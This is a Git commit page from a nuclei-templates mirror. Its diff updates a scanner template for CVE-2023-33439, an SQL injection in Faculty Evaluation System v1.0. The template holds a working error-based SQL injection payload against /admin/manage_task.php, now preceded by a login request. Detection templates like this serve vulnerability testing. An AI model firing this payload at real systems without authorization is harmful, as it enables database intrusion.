daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2023-33439.yaml

patch-1
Ritik Chaddha 2023-07-07 15:30:05 +05:30 committed by GitHub
parent a59080c824
commit d389ef4754
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
http/cves/2023/CVE-2023-33439.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2023-33439 id: CVE-2023-33439
info: info:
name: SQL Injection - Faculty Evaluation System name: Faculty Evaluation System v1.0 - SQL Injection
author: Harsh author: Harsh
severity: high severity: high
description: | description: |
@ -16,13 +16,20 @@ info:
cwe-id: CWE-89 cwe-id: CWE-89
metadata: metadata:
verified: true verified: true
tags: cve,cve2023,sql,unauthenticated tags: cve,cve2023,sqli,faculty,authenticated
http: http:
- raw: - raw:
- | - |
GET /eval/admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1 POST /ajax.php?action=login HTTP/1.1
Host:{{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
email={{username}}&password={{password}}&login=1
- |
GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1
Host:{{Hostname}} Host:{{Hostname}}
Content-Type: application/x-www-form-urlencoded
cookie-reuse: true cookie-reuse: true
redirects: true redirects: true
@ -30,6 +37,6 @@ http:
- type: dsl - type: dsl
dsl: dsl:
- 'status_code == 200' - 'status_code == 200'
- 'contains(body, "Fatal error")' - 'contains(body, "Fatal error:")'
- 'contains(body, "Uncaught Error: Call to a member function fetch_array()")' - 'contains(body, "XPATH syntax error:")'
condition: and condition: and